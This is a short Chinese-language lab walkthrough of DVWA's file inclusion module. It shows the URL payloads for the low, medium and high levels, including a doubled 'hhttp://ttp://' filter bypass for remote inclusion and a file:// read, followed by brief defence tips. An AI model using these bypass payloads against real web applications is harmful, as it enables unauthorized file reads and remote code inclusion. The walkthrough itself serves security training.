一:什么是文件包含漏洞
文件包含(File Inclusion)是一些对文件操作的函数未经过有效过滤,运行了恶意传入的非预期的文件路径,导致敏感信息泄露或代码执行。如果文件中存在恶意代码,无论什么样的后缀类型,文件内的恶意代码都会被解析执行,这就导致了文件包含漏洞的产生。
二:文件包含漏洞通关
将等级设置为low
点击文件包含漏洞模块,可以看到URL是
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=include.php
我们先创建一个文件,命名为1.txt,将文件内容写为hello,如下图:
记住文件的地址,我这里的地址为:C:\1.txt,接着讲URL换成
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=C:\1.txt
可以看到页面正常访问到1.txt,说明存在文件包含漏洞
将等级设置为medium
(1)本地包含漏洞
直接访问本地的,可以发现没有限制
(2)远程包含漏洞
利用双写绕过实现,因为会过滤http://,所以将其修改为hhttp://ttp://(红色部分是被过滤的内容)
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=hhttp://ttp://192.168.24.128/1.txt
将等级设置为high
可利用file协议进行读文件,将URL设置为
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file://C://1.txt
三:文件包含漏洞的防范
1.及时更新软件修复漏洞
2.管理权限,allow_url_include和allow_url_fopen最小权限化